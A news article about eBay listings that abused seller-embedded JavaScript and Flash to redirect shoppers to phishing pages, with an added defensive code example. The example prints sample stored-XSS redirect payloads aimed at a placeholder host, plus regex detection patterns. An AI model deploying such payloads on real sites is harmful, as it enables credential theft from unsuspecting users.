Online auction giant eBay is in hot water following a report by the BBC that dozens of listings on the site have been used to con shoppers into surrendering private information. According to the news service, the listings automatically redirect users to malicious Web sites as part of a password harvesting scam.

Users have complained of being locked out of their accounts because they have been hijacked by scammers. Some have also been charged fees by the company for sales they claimed they never made.

eBay Aware Since February

eBay removed several listings as a result of the stories, and said that it would continue to review site content for malicious postings. However, the company told the BBC that it viewed the vulnerability as an isolated incident, saying that hackers “intentionally adapt their code and tactics to try to stay ahead of the most sophisticated security systems.”

Although eBay said it moved quickly to address complaints of the flaw once it became aware of it, the BBC said it spoke with users who have been complaining about the vulnerability to eBay since at least February. The news service found 64 listings posted in the last 15 days that could pose threats to users.

The redirect targets appear to be part of a phishing scheme designed to harvest eBay users’ personal data, such as bank account details, credit card numbers, and passwords. However, the sites could expose users to even greater threats, such as infecting their computers with malware. The company maintained that this type of security problem is not a new one for services like eBay.

Cross-Site Scripting Exploit

The exploit seems to stem from eBay’s policy of allowing sellers to embed Flash and JavaScript in their listings to create so-called “active” content. Because that content is served from eBay’s own pages and runs with the site’s full trust in the visitor’s browser, a malicious seller can use it for a stored cross-site scripting attack: the listing loads normally, then silently redirects the visitor to a look-alike phishing page where they are asked to re-enter their credentials.

"Many of our sellers use active content like Javascript and Flash to make their eBay listings more attractive,” a spokesperson for eBay told the BBC on Friday. “However, we are aware that active content may also be used in abusive ways."
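The following is an added illustration, not code from the article or from eBay, of the technique described above and of the obvious countermeasure. The listing HTML is constructed for the example, the domain phish.example.invalid is a placeholder rather than any real site, and the pattern list is a deliberately small allowlist-style filter that flags and strips the classes of seller content capable of redirecting a visitor (script tags, plugin objects, inline event handlers, `javascript:` URLs and meta refreshes). It handles quoted attribute values only; a production sanitizer should parse the HTML rather than pattern-match it.

```javascript
// Added example: how seller-supplied "active content" in an auction listing can
// redirect a visitor to a phishing page, and a simple filter that flags and
// strips such content before the listing HTML is rendered to other users.
// The listing below is constructed for this example; phish.example.invalid is a
// placeholder domain, not a real site.

const MALICIOUS_LISTING = `
<h1>Genuine Widget, Buy It Now!</h1>
<p>Ships from warehouse.</p>
<script>
  // Runs in the auction site's origin, then moves the visitor to a
  // look-alike sign-in page that harvests the credentials they retype.
  window.location.replace("http://phish.example.invalid/signin.html");
</script>
<img src="x" onerror="location.href='http://phish.example.invalid/'">
<object data="http://phish.example.invalid/redirect.swf"></object>
<a href="javascript:location='http://phish.example.invalid/'">See more photos</a>
`;

// Each pattern names one class of content that can run code or redirect.
// Attribute patterns assume quoted values (href="..." or href='...').
const ACTIVE_CONTENT_PATTERNS = {
  scriptTag:    /<script\b[\s\S]*?<\/script\s*>/gi,
  pluginObject: /<(object|embed|applet|iframe)\b[^>]*>(?:[\s\S]*?<\/\1\s*>)?/gi,
  eventHandler: /\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*')/gi,
  jsUrl:        /\s+(href|src|action)\s*=\s*(["'])\s*javascript:[\s\S]*?\2/gi,
  metaRefresh:  /<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*>/gi,
};

// Returns the names of the active-content classes present in a listing,
// in the fixed order of ACTIVE_CONTENT_PATTERNS. Empty array means static markup only.
function findActiveContent(html) {
  return Object.entries(ACTIVE_CONTENT_PATTERNS)
    .filter(([, re]) => { re.lastIndex = 0; return re.test(html); })
    .map(([name]) => name);
}

// Removes every matched fragment so that only static markup remains.
function stripActiveContent(html) {
  let out = html;
  for (const re of Object.values(ACTIVE_CONTENT_PATTERNS)) {
    out = out.replace(re, "");
  }
  return out;
}

// Stand-alone run: report what was found, then show the cleaned listing.
console.log("active content found:", findActiveContent(MALICIOUS_LISTING));
console.log(stripActiveContent(MALICIOUS_LISTING));
```

Run under Node; the first line printed lists the four classes present in the constructed listing, and the cleaned markup keeps the headline and description but contains no script, plugin object, handler attribute or redirect URL. The simplest policy, and the one the quoted spokesperson is edging toward, is to reject any listing for which `findActiveContent` returns a non-empty list rather than to try to clean it.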

The exploit is only the latest in a series of security issues that have plagued the online retailer this year. In May, hackers managed to steal private data from 145 million eBay users, including passwords, addresses and other information. The company was criticized at the time for its slow response to the attack.

In June, eBay’s event ticket reseller platform, StubHub, was attacked by hackers who used harvested login credentials to take over accounts, buy high-value event tickets and resell them for a profit. That attack was said to have generated more than $1 million for the hackers.